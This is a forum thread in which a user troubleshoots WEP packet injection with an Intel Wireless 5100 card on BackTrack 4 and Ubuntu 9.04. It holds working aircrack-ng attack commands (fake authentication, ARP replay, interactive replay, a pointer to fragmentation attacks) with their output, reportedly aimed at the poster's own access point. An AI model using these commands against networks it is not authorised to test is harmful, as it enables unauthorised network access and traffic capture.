Injection problem with Intel Wireless 5100

[JohnBell]

Hi.

I am testing LiveCD BackTrack 4 Beta on a VAIO VGN-SR19VN using an Intel Wireless Link 5100 card.
As I've read in previous posts, this card works perfectly in BT4. In fact, I can perform net scanning and IVs capture. But the problem arises when I try to perform packet injection. I manage to send the authentication query and it says that there is authentication success, but it won't connect to the AP to start injection. I am trying it with my own AP, which uses WEP codification.
Therefore, the problem can't be related to proximity, since I perform the attack next to the router. Besides, my AP does not use MAC filtering and it is not protected again WEP attacks, because once I managed to crack my net using Troppix distribution.
I hope someone can help me with this problem. Thanks.

John Bell

[Handsome-geek]

Try this:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h [interface Mac] [device]

[kazalku]

And also try to lower the rate:

iwconfig eth1 (or whatever) rate 1MB

[JohnBell]

Thanks for your answers Handsome-geek and kazalku.
I've tried again, taking into account your advises and that's been the result:

Code:

root@bt:~# aireplay-ng -1 0 -a [BSSID] -h [INTERFACE_MAC] -e [ESSID] [DEVICE]

12:15:36  Waiting for beacon frame (BSSID: [BSSID]) on channel 1


12:15:36  Sending Authentication Request (Open System)


12:15:38  Sending Authentication Request (Open System)


12:15:40  Sending Authentication Request (Open System)



...



12:16:06  Sending Authentication Request (Open System)

Attack was unsuccessful. Possible reasons:


    * Perhaps MAC address filtering is enabled.

    * Check that the BSSID (-a option) is correct.

    * Try to change the number of packets (-o option).

    * The driver/card doesn't support injection.

    * This attack sometimes fails against some APs.

    * The card is not on the same channel as the AP.

    * You're too far from the AP. Get closer, or lower

      the transmit rate.



root@bt:~# aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [BSSID] -h [INTERFACE_MAC] [DEVICE]
For information, no action required: Using gettimeofday() instead of /dev/rtc

Read 415 packets...

This time I've tested it on a public net, that is, no encryption applied.
Regarding to possible reasons outlined:

* Perhaps MAC address filtering is enabled - This is not the case

* Check that the BSSID (-a option) is correct. - It is correct

* Try to change the number of packets (-o option). - I've tried this with different values, but no success.
* The driver/card doesn't support injection. - As was previously tackled in this forum, my card does support injection
* This attack sometimes fails against some APs. - I'm not sure; it might be possible on this AP. But it has failed with all APs I've tried
* The card is not on the same channel as the AP. - As it says on the command line, it seems the channels are the same: 'Waiting for beacon frame [...] on channel 1'.
* You're too far from the AP. Get closer, - that is not definitely the problem
or lower the transmit rate (I've done so).

I've tried to inject IV's on a WEP encrypted net and on an unprotected net and the attacks have failed in all of them.
What could be the problem? I think it has to do with my card/computer because as I've said before once I tried to crack my AP that uses WEP encr.
with a different laptop using an Intel Wireless card and Troppix distribution, and I managed to inject IV's successfully.
Thanks for your patience.

John Bell

[Handsome-geek]

Now when i see screen i am 80% sure that card dosent support injection or you dont have driver for that on Back Track.Try with BT4 beta maybe has driver for injection for your card by default.

If your attack is unsuccessful wich is case, if you dont get handshake with AC( target) then all other steps all pointless.Command which i gave you might generate ARP requests only if you get handshake which isnt in your case.

Try with BT4 and tell me result or get some Usb wireless.

Sorry for previous post i didnt see that you try this with BT4 sorry. Get some good wireless usb adapter.They are not expensive and injection is very good.

[JohnBell]

Thanks for your patience, Handsome-geek.
I previously read that my card model does support injection in a thread of this very forum which linked to an aircrack-ng forum (I am sorry, I am not allowed to post the URL since I am a newbie member).

After reading the post, I decided to install the Ubuntu 9.04 32 bits on my laptop.

I've installed aircrack-ng on my new Ubuntu distribution and I've tested it against a free encryption net, that is, the public net I use in my home but configured without protection.

This time, this has been the result:

Code:

sudo aireplay-ng -1 0 -a [BSSID] -h [MAC_INTERFACE] -e [ESSID] mon0
03:38:23  Waiting for beacon frame (BSSID: [BSSID]) on channel 13

03:38:23  Sending Authentication Request (Open System)

03:38:25  Sending Authentication Request (Open System)

03:38:27  Sending Authentication Request (Open System)

03:38:29  Sending Authentication Request (Open System) [ACK]
03:38:29  Authentication successful
03:38:29  Sending Association Request

03:38:34  Sending Authentication Request (Open System)

...

03:39:04  Sending Authentication Request (Open System) [ACK]
03:39:04  Authentication successful
03:39:04  Sending Association Request [ACK]
03:39:04  Association successful :-) (AID: 1)
kraken@kraken-laptop:~$ sudo aireplay-ng -3 -b [BSSID] -h [MAC_INTERFACE] mon0
03:41:11  Waiting for beacon frame (BSSID: [BSSID]) on channel 13
Saving ARP requests in replay_arp-0513-034111.cap
You should also start airodump-ng to capture replies.
Read 20611 packets (got 0 ARP requests and 35 ACKs), sent 0 packets...(0 pps)

Ok, this time it seems I manage to associate successfully but it won't sent packets.
Moreover, after performing injection test with aireplay, I get apparently good results:

Code:

kraken@kraken-laptop:~$ sudo aireplay-ng -9 mon0
04:03:56  Trying broadcast probe requests...
04:03:56  Injection is working!
04:03:58  Found 2 APs

04:03:58  Trying directed probe requests...
04:03:58  [BSSID] - channel: 11 - 'NET01'
04:04:03  Ping (min/avg/max): 0.038ms/47.253ms/118.576ms Power: -80.83
04:04:03   6/30:  20%

04:04:03  [BSSID] - channel: 13 - 'NET02'
04:04:05  Ping (min/avg/max): 6.660ms/57.116ms/71.297ms Power: -82.29
04:04:05  28/30:  93%

So, regarding these results and all the information found in previous entries in this forum and in aircrack-ng forum, my card does support injection.
It seems we have taken an step further now, because I have managed to associate to the AP. But the problem of packet sending persists. Any ideas?
By the way, thanks a lot for your help.

John Bell

[Handsome-geek]

Now you can try command which i gave you in first post or try -5 attack with fragmentation attack but procedure is differnt from standard attack(-3) you also use tool packetforge-ng.

You can see on offensive security site in videos how real masters do it like muts.
Name of video is clientless wep attack i think i also manage to decrypt my Ap by this method.

But as i can see form screen and pw of signal you are far from victim try get closer or dont you try to crack someonelse wep key (just a joke).Try get closer.
Just watcj carefule video and repeat.

[JohnBell]

Ok, after testing it with Ubuntu 9.04 I've managed to inject successfully.
In fact, in the previous post, I would have probably ended up injecting if I had waited for a little, because it seems aireplay has to read some packets until an ARP packet is captured and then it starts the reply of ARP packets, with subsequent IVs being generated.

One thing I have noticed is that my card (Intel Wireless 5100) uses an specific monitor interface, called mon0, and a general interface, called wlan0, and Ubuntu does not allow
me to use wlan0 with any aircrack-ng program, giving the following error:

Code:

ioctl(SIOCSIWMODE) failed: Device or resource busy
ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211,
ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead.  Make
sure RFMON is enabled: run 'airmon-ng start wlan0 <#>'
Sysfs injection support was not found either.

so mon0 interface must be used.
I have not tested if injection works with BT4 using the interface mon0. Perhaps it would, and that was the reason of the problem.
Anyway, BT4 didn't give me that error, and I could use wlan0 interface.
I will try to use mon0 interface with BT4 to see what happens - when I have time - and I will post the results in this thread, so that people who have had trouble with this card can find a solution to this issue.

By the moment, an effective breakthrough would be to use Ubuntu 9.04, install aircrack-ng (by typing "sudo apt-get install aircrack-ng"on shell) and proceed with injection using mon0 interface.

Thanks a lot to Handsome-geek (and also to kazalku) for their help.

John Bell